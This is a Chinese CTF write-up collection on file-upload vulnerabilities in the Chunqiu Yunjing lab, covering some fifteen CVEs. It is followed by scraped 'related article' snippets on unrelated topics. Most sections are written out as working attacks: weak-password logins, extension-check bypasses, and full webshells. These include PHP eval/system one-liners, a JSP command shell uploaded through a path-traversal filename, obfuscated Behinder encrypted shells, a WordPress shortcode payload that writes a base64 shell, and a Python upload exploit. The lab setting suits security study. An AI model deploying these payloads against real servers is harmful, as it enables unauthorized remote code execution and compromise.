【春秋云境】文件上传漏洞合集

CVE-2022-30887

1.题目简介

在这里插入图片描述

2.CVE-2022-30887简介

在这里插入图片描述

使用工具:

蚁剑 burpsuite 一句话木马

3.渗透测试

输入用户名密码进行抓包

在这里插入图片描述

猜测账号密码

无有用信息,根据页面现有信息找到作者邮箱:

mayuri.infospace@gmail.com,猜测密码为:mayurik,成功进入

上传一句话木马

找到文件上传点,上传一句话木马:

<?php @eval($_POST['cmd']);?>

在这里插入图片描述

上传成功后:

img

右击图片,查看图片地址,就是木马文件路径:

在这里插入图片描述

http://xxx.ichunqiu.com/assets/myimages/cmd.php

蚁剑连接

在这里插入图片描述

连接后根目录下找到flag:

在这里插入图片描述

查看flag:

flag{71284f68-7422-4e3e-bf04-cc2dc8d9068d}

使用官方POC

国家信息安全漏洞库

POC代码如下:

POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1
 
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"
 
 
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg
 
<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"
 
 
-----------------------------208935235035266125502673738631--

shell.php:

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>

在这里插入图片描述
在这里插入图片描述

CVE-2022-29464

1.题目简介

在这里插入图片描述

2.CVE-2022-29464简介

在这里插入图片描述

使用工具:

burpsuite

3.渗透测试

burp抓包修改参数

刷新登录界面,使用burp抓包

在这里插入图片描述

官方POC

这两个参数需要用本机抓包的:

  1. Host: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  2. Accept: /

其他参数修改为官方POC

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebvsitkv90bqjmtexq.cloudeci1.ichunqiu.com:9443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Length: 896
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
  • /fileupload/toolsAny是一个文件上传接口,Content-Type指定为multipart/form-data并在请求体中填入想要上传的文件内容。

  • 文件名指定为name=“…/…/…/…/repository/deployment/server/webapps/authenticationendpoint/testshell.jsp”;

  • 文件内容为:构造一个表单,文本框输入要执行的命令,然后提交。jsp代码为:获取命令内容,构造Runtime.getRuntime()命令执行器,传入命令,读取命令执行结果并显示在页面上。

    在这里插入图片描述

在这里插入图片描述

利用脚本

上传成功后访问http://eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443/authenticationendpoint/testshell.jsp ,访问上传的shell脚本

在这里插入图片描述

在这里插入图片描述

得到flag:

flag{6d148537-ed52-481d-b12b-e967d5c3f5ed}

CVE-2022-28525

1.题目简介

在这里插入图片描述

2.CVE-2022-28525简介

在这里插入图片描述

使用工具:brupsuite

3.渗透测试

在这里插入图片描述

使用弱口令admin/admin登录,找到文件上传点

在这里插入图片描述

上传一句话木马,修改文件后缀名为jpg

在这里插入图片描述

brup抓包

brup修改文件后缀名

在这里插入图片描述
在这里插入图片描述

利用一句话木马

在这里插入图片描述

得到flag:

flag{6707239e-0ef0-4af9-a6c2-9a860904cc41}

CVE-2022-25411

1.题目简介

在这里插入图片描述

2.CVE-2022-25411简介

在这里插入图片描述

3.渗透测试

扫描后台目录

在这里插入图片描述

进入/admin/do目录,弱口令为admin/admin888

谷歌翻译一下:

在这里插入图片描述

在这里新增php文件类型

在这里插入图片描述

上传php木马:

在这里插入图片描述

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>
冰蝎连接

在这里插入图片描述

得到flag:

flag{fcc9b016-77c4-4839-93ad-17615abf5dcb}

CVE-2022-23880

1.题目简介

在这里插入图片描述

2.CVE-2022-23880简介

在这里插入图片描述

3.渗透测试

在这里插入图片描述

登录/admin,弱口令admin/123登录

在这里插入图片描述

文件管理,编辑任意php文件为木马,冰蝎连接

在这里插入图片描述

得到flag:

flag{7f7ef845-4fc7-4f40-9b0a-09672fb6610e}

CVE-2022-26201

1.题目简介

在这里插入图片描述

2.CVE-2022-26201简介

在这里插入图片描述

3.渗透测试

不登录,直接选择Admin

在这里插入图片描述

构造一句话木马
<?php system($_GET['pass']);?>

在这里插入图片描述

php文件改为jpg文件上传

在这里插入图片描述

burp抓包

jpg改为php

在这里插入图片描述

利用一句话木马

在这里插入图片描述

得到flag:

f1ag{dc5bbb61-c905-49bb-9b28-b40844aad462}

VE-2022-25578

1.题目简介

在这里插入图片描述

2.VE-2022-25578简介

在这里插入图片描述

3.渗透测试

弱口令猜测

访问/admin路径,输入弱口令admin/tao进入后台

在这里插入图片描述

访问文件管理路径

修改.htaccess文件

htaccess文件(或者分布式配置文件),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,
即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,
以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

找到.htaccess文件,点击进入将AddType application/x-httpd-php .jpg添加到后面保存文件(这只是以解析jpg为例)

在这里插入图片描述

保存后点击pictures文件夹,输入文件名,新建文件

在这里插入图片描述

此处两个按钮均出错,应该是靶场问题,改为添加文章处上传文件

制作一句话木马

在这里插入图片描述

改为jpg文件并上传得到绝对路径

在这里插入图片描述

访问url路径得到flag:

在这里插入图片描述

直接修改网站的php文件

或者可以选择文件管理的一个php文件进行编辑,这里我选择的是rss.php

在这里插入图片描述

这样网站的rss.php就成了我的shell,直接执行命令获取flag:

在这里插入图片描述

flag{3ecd123d-48ff-4680-be9e-e2d1a422beb1}

CVE-2022-25099

1.题目简介

在这里插入图片描述

2.CVE-2022-25099简介

在这里插入图片描述

3.渗透测试

御剑扫描

在这里插入图片描述

进入/admin/login,使用简单密码进行猜测

在这里插入图片描述

得到密码为admin/123456

在这里插入图片描述

找到文件上传点,上传一句话木马:

<?php
    eval($_REQUEST['cmd']);
    system('cat /flag');
?>

得到flag:

在这里插入图片描述

flag{dcac08b6-e042-4840-8e15-649881341c0a}

CVE-2022-24663

1.题目简介

在这里插入图片描述

2.CVE-2022-24663简介

在这里插入图片描述

3.渗透测试

扫描目录

在这里插入图片描述

根据readme找到登录界面

在这里插入图片描述

在这里插入图片描述

题目提示为弱口令

Burp抓包爆破

在这里插入图片描述

在这里插入图片描述

测试得弱口令为test/test,进入之后,现在是订阅者权限,就是低权限,我们选择修改代码,在任意页面插入以下代码:

<form action="http://eci-2ze10vmvzbwvhfundgqa.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea>
      <input type="submit" value="Execute" />
</form>

定位到代码:
在这里插入图片描述

选择以HTML格式修改

在这里插入图片描述

直接把这个框里面的内容全部替换成上面的代码,然后保存,页面修改如下:

在这里插入图片描述

点击execute后会出现success字样:

在这里插入图片描述

访问上传的shell,得到flag

在这里插入图片描述

flag{c9e21a78-c553-4d4d-903c-7a7de8857a18}

CVE-2022-23906

1.题目简介

在这里插入图片描述

2.CVE-2022-23906简介

在这里插入图片描述

3.渗透测试

御剑后台扫描

在这里插入图片描述

访问/admin,弱口令admin/123456登录

上传shell.php的png格式

在这里插入图片描述

copy改为php格式

在这里插入图片描述

冰蝎连接

在这里插入图片描述

得到flag:

flag{19c7c011-590f-43da-992d-972a2c8dd331}

CVE-2022-23043

1.题目简介

在这里插入图片描述

2.CVE-2022-23043简介

在这里插入图片描述

3.渗透测试

扫描目录

在这里插入图片描述

进入robots.txt发现有admin后台

在这里插入图片描述

根据题目提示输入登陆信息:admin/adminqwe12

在这里插入图片描述
在这里插入图片描述

找到上传点

修改文档存放位置为/tmp,修改好后点击Continue

在这里插入图片描述

选择Configuration-File/MIME Types-+Create创建新的文件类型,格式为phar 类型为 text/plain 保存(php类型系统不让设置)

在这里插入图片描述

在这里插入图片描述

上传一句话冰蝎木马

上传失败可以重新设置一下phar文件类型

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

cmd.phar(由Webshell生成工具生成,连接密码为cmd)

<?php @error_reporting(0);session_start();$key="dfff0a7fa1a55c8c";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$Hj337=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$Hj337=$t($Hj337."");for($i=0;$i<strlen($Hj337);$i++) { $new_key = $key[$i+1&15];$Hj337[$i] = $Hj337[$i] ^ $new_key;}	}else{ $Hj337=openssl_decrypt($Hj337, "AES128", $key);}$arr=explode('|',$Hj337);$func=$arr[0];$params=$arr[1];class G7626Rp4{ public function __invoke($p) {@eval("/*Z018D99rVC*/".$p."");}}@call_user_func/*Z018D99rVC*/(new G7626Rp4(),$params);?>
冰蝎连接

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到flag:

flag{1c5ca734-3051-4315-9c2d-618ac8874ff6}

CVE-2023-38836

1.题目简介

在这里插入图片描述

2.CVE-2023-38836简介

在这里插入图片描述

3.渗透测试

观察到存在admin界面,使用弱口令admin/password登录

在这里插入图片描述

伪造GIF文件头

找到文件上传点,根据题目提示给文件最前端加上GIF89a,伪造GIF文件头

GIF89a<?php @error_reporting(0);session_start();$key="dfff0a7fa1a55c8c";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$Hj337=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$Hj337=$t($Hj337."");for($i=0;$i<strlen($Hj337);$i++) { $new_key = $key[$i+1&15];$Hj337[$i] = $Hj337[$i] ^ $new_key;}	}else{ $Hj337=openssl_decrypt($Hj337, "AES128", $key);}$arr=explode('|',$Hj337);$func=$arr[0];$params=$arr[1];class G7626Rp4{ public function __invoke($p) {@eval("/*Z018D99rVC*/".$p."");}}@call_user_func/*Z018D99rVC*/(new G7626Rp4(),$params);?>

上传成功,点击View获取文件路径

在这里插入图片描述

冰蝎连接

在这里插入图片描述
得到flag:

flag{cf1b7a93-c059-41f4-b90a-964497d84154}

CVE-2023-37569

1.题目简介

在这里插入图片描述

2.CVE-2023-37569简介

https://nvd.nist.gov/vuln/detail/CVE-2023-37569

3.渗透测试

使用弱口令admin/password登录界面

在这里插入图片描述

找到文件上传点,直接上传cmd.php文件

在这里插入图片描述

在这里插入图片描述

冰蝎连接

在这里插入图片描述

得到flag: flag{67924f93-f8da-4ca8-a368-02666cc2a1b1}

CVE-2020-26048

1.题目简介

在这里插入图片描述

2.CVE-2020-26048简介

在这里插入图片描述

3.渗透测试

使用弱密码admin/admin登录

在这里插入图片描述

直接上传php文件不被允许,先上传一个jpg版本:

在这里插入图片描述

Burp修改文件名

打开Burp开启拦截,重命名为php文件

在这里插入图片描述

在这里插入图片描述

删除.htaccess文件

需要删除.htaccess文件 才可以访问到shell

在这里插入图片描述

冰蝎连接

在这里插入图片描述

得到flag:

flag{2efa4820-bbb0-4c60-8c63-b7260945e4f6}

CVE-2019-9042

1.题目简介

在这里插入图片描述

2.CVE-2019-9042简介

在这里插入图片描述

3.渗透测试

使用弱口令admin/admin登录,进入Content-File界面,上传shell

在这里插入图片描述

御剑后台扫描/files路径

在这里插入图片描述

在这里插入图片描述

冰蝎连接

在这里插入图片描述

或者直接上传一句话木马:<?php system($_GET['pass']); ?>

在这里插入图片描述
得到flag:

flag{1c372c23-a705-4c61-9fc8-2c4ceacff376}

CVE-2018-2894

1.题目简介

在这里插入图片描述

2.CVE-2018-2894简介

在这里插入图片描述

3.渗透测试

config.do、begin.do页面没有设置登录授权后访问

访问/ws_utc/config.do页面(跳转不成功也可以先进入/ws_utc/begin.do页面点设置按钮)

因为ws_utc应用的静态文件css目录是无需访问权限的,而默认的工作目录即使上传成功,也无法访问。

通用模块:
Work home dir:
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
http proxy host: ws_utc
03 http proxy port:80

在这里插入图片描述

在安全模块点击添加,在Keystroe文件上传处上传shell:

在这里插入图片描述

检查当前页面元素查看时间戳:

在这里插入图片描述

该文件的访问路径就是:
http://ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

访问:

http://eci-2ze60yiscyji4su1sx0t.cloudeci1.ichunqiu.com:7001/ws_utc/css/config/keystore/1713943977134_shell.php

但显示404 not found,访问/console/login/LoginForm.jsp页面,无法使用weblogic登陆后台(无法获取密码)

在这里插入图片描述

应该是容器出了问题,正常上传后通过冰蝎连接后即可。

使用Weblogic漏洞利用工具也检测不出漏洞

CVE-2018-19422

1.题目简介

在这里插入图片描述

2.CVE-2018-19422简介

在这里插入图片描述

3.渗透测试

使用弱密码admin/admin登录系统

在这里插入图片描述

进入设置,找到文件上传点

在这里插入图片描述

根据提示,直接上传php格式的shell文件,但是发现右键打开显示404not found(.phar格式也是),故更改后缀为**.pht**

在这里插入图片描述

在这里插入图片描述

冰蝎连接

在这里插入图片描述

或者直接上传一句话木马:

<?php 
if($_REQUEST['a']){
	system($_REQUEST['a']);
} else phpinfo();
?>

在这里插入图片描述

得到flag: flag{57b162d7-6942-4b40-9710-279748a81ba8}

CVE-2017-20063

1.题目简介

在这里插入图片描述

2.CVE-2017-20063简介

在这里插入图片描述

3.渗透测试

官方POC:

#/usr/local/bin/python3
# -*-coding:utf-8-*-
 
import requests,os
site="eci-2ze0upmwz149h0mq7wel.cloudeci1.ichunqiu.com"
file_to_upload ='s.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

其中site替换为自己的url地址,file_to_upload替换为shell文件名

s.php:

<?php
system('cat /flag');phpinfo();
?>

在这里插入图片描述

在这里插入图片描述

得到flag: flag{4def81e3-5b4f-438b-aae9-a5a5fd5da6a8}

一句话木马示例

<?php eval($_REQUEST['key']); ?> <?php system($_REQUEST['ab']); ?> <?php system($_GET['pass']); ?> <?php eval($_POST[1]); ?> <?php eval($_GET[1]); ?>

webshell分别为:key,ab,pass,1,1

system函数多用于直接在url中输入webshell

冰蝎使用的webshell:

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/572715.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

每日一题:跳跃游戏II

给定一个长度为 n 的 0 索引整数数组 nums。初始位置为 nums[0]。 每个元素 nums[i] 表示从索引 i 向前跳转的最大长度。换句话说&#xff0c;如果你在 nums[i] 处&#xff0c;你可以跳转到任意 nums[i j] 处: 0 < j < nums[i] i j < n 返回到达 nums[n - 1] 的最…

YOLOv3没有比这详细的了吧

YOLOv3&#xff1a;目标检测基于YOLOv2的改进 在目标检测领域&#xff0c;YOLO&#xff08;You Only Look Once&#xff09;系列以其出色的性能和速度而闻名。YOLOv3作为该系列的第三个版本&#xff0c;不仅继承了前身YOLOv2的优势&#xff0c;还在多个方面进行了创新和改进。…

机器学习理论基础—支持向量机的推导(一)

机器学习理论基础—支持向量机的推导 算法原理 SVM:从几何角度&#xff0c;对于线性可分数据集&#xff0c;支持向量机就是找距离正负样本都最远的超平面&#xff0c;相比于感知机&#xff0c;其解是唯一的&#xff0c;且不偏不倚&#xff0c;泛化性能更好。 超平面 n维空间…

如何拿取 macOS 系统中的图标文件

如何拿取 macOS 系统中的图标文件 比如在 Finder 中看到这个文件夹图标很好看&#xff0c;想用一下&#xff0c;就是不知道它在什么位置&#xff0c;我来告诉你。 它在系统中的位置是 /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/如何打开这个位置&am…

计算机网络物理层思维导图+大纲笔记

大纲笔记&#xff1a; 物理层的基本概念 解决如何在连接各种计算机的传输媒体上传输数据比特流&#xff0c;而不是具体的传输媒体 主要任务 确定与传输媒体接口有关的一些特性 机械特性 电气特性 功能特性 规程特性信道上传送的信号 基带信号 来自信源的信号&#xff0c;直接表…

【CLI命令行接口和Java连接openLooKeng查询数据 】

CLI命令行接口和Java连接openLooKeng查询数据 一、摘要二、正文0. 环境说明1. CLI命令行工具的使用2. Java API 的使用三、小结一、摘要 通过CLI命令行接口工具连接openLooKeng,可帮助初学者能够使用SQL语句的方式快速操作openLooKeng,任何只要熟悉SQL的人都可以快速切换到op…

解决 uniapp uni.getLocation 定位经纬度不准问题

【问题描述】 直接使用uni.getLocation获取经纬度不准确&#xff0c;有几百米的偏移。 【解决办法】 加偏移量 //加偏移 let x longitude let y latitude let x_pi (3.14159265358979324 * 3000.0) / 180.0 let z Math.sqrt(x * x y * y) 0.00002 * Math.sin(y * x_pi)…

ArcGIS Pro专题地图系列教程

专题地图系列是ArcGIS Pro3.2的新功能。之前&#xff0c;如果要做8张相同区域的专题图&#xff0c;可能需要新建8个布局&#xff0c;分别进行排版&#xff0c;再导出。现在&#xff0c;一幅地图&#xff0c;一个布局&#xff0c;就可以完成这个流程。 原理是&#xff0c;根据单…

Swift-24-集合对象

概述 在了解正式内容之前可以先回顾下objectiveC中提供的集合特性。 它的特点是&#xff0c;拿NSArray举例&#xff0c;包含NSArray 和 NSMutableArray两个API&#xff0c;前者是不可变数组&#xff0c;一旦创建其值和数量就不能改变了&#xff1b;NSMutableArray是可变数组&…

tableau基础学习——添加标靶图、甘特图、瀑布图

标靶图 添加参考线 添加参考分布 甘特图 创建新的字段 如设置延迟天数****计划交货日期-实际交货日期 为正代表提前交货&#xff0c;负则代表延迟交货 步骤&#xff1a;创建——计算新字段 把延迟天数放在颜色、大小里面就可以 瀑布图 两个表按照地区连接 先做个条形图&…

工业4.0的基石:探索工业级光模块的力量

引言 工业4.0代表着智能制造的新时代&#xff0c;而工业级光模块则是这一革命性转变的基石。这些高科技组件不仅是现代通信网络的核心&#xff0c;更是连接智能工厂、智慧城市和远程服务的关键。本文将深入探讨工业级光模块的技术特性、应用领域以及它们如何塑造未来工业的面貌…

公司网页制作需要多少钱

公司网页制作需要多少钱&#xff1f;这是一个非常常见的问题。答案取决于您需要的功能和设计。一些小型企业网站可能只需要一些基本的功能&#xff0c;花费可能低至几百美元&#xff0c;而一些大型企业网站可能需要高级功能和设计&#xff0c;可能需要几万美元。 以下是一些考虑…

js如何获取对象的属性值

获取对象的属性值&#xff0c;有两种方式。 方式一&#xff1a; 对象.属性名 let obj {name:张三,age:23 }; console.log(obj.name); //张三方式二&#xff1a; 对象[属性名] let obj {name:张三,age:23 }; console.log(obj[name]); //张三 两种方式有什么不同&am…

Mac安装telnet

一、安装Homebrew 1、打开官网&#xff1a;Homebrew — The Missing Package Manager for macOS (or Linux) 2、打开终端输入&#xff1a; /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 二、安装Telnet bre…

内容策略的精准定位:Kompas.ai的目标受众分析

在这个信息爆炸的时代&#xff0c;内容营销已经成为品牌与消费者沟通的重要桥梁。然而&#xff0c;随着内容的海量增长&#xff0c;品牌如何从众多信息中脱颖而出&#xff0c;成为营销人员面临的巨大挑战。精准定位目标受众&#xff0c;不仅能够帮助品牌更有效地传达信息&#…

nginx 的漏洞改造

Nginx 的漏洞扫描有很多整改项 资源下载地址&#xff1a;https://download.csdn.net/download/wangzhi291/89216805 资源里面需要conf/modules 需要上传 然后docker镜像文件 配置按下面的修改就行了 整改方法为增加 ngx_http_headers_more_filter_module模块 include /usr…

贪吃蛇详解

Win32 API介绍&#xff1a; 在写贪吃蛇这款游戏时需要用到一些有关Win32 API的知识&#xff0c; 接下来我会将设计到的知识点列举并讲解&#xff1a; 首先我们先了解一下Win32 API是什么&#xff0c;Windows这个多作业系统除了协调应⽤程序的执⾏、分配内存、管理资源之外&am…

Unity射线实现碰撞检测(不需要rigbody组件)

使用physic.CapsulCast&#xff08;&#xff09;&#xff1b; 前面3个参数生成一个胶囊体&#xff0c; 向着发射方向&#xff0c;发射出一串的胶囊&#xff08;没有最大距离&#xff09; 有最大距离&#xff0c;可以节约性能开销。 physic.CapsulCast&#xff08;&#xff0…

类的六个构造函数相关干货

构造函数 特点 1.名字与类名相同 2.无返回值 3.对象实例化的时候编译器自动调用这个函数 4.构造函数可以重载&#xff08;无参构造函数&#xff0c;拷贝构造等&#xff09; 5.如果类中没有显式定义构造函数&#xff08;深拷贝&#xff09;&#xff0c;则编译器会自动生成一个…

IP地址查询API接口怎么对接

IP地址查询API接口又叫IP归属地信息查询API接口&#xff0c;指的是根据IP地址查询归属地定位信息&#xff0c;包含国家、省、市、街道和运营商、区号、邮编、坐标等信息。那么IP地址查询API接口该怎么对接呢&#xff1f; 首先我们找到一家有做IP归属地信息查询API接口的服务商…
最新文章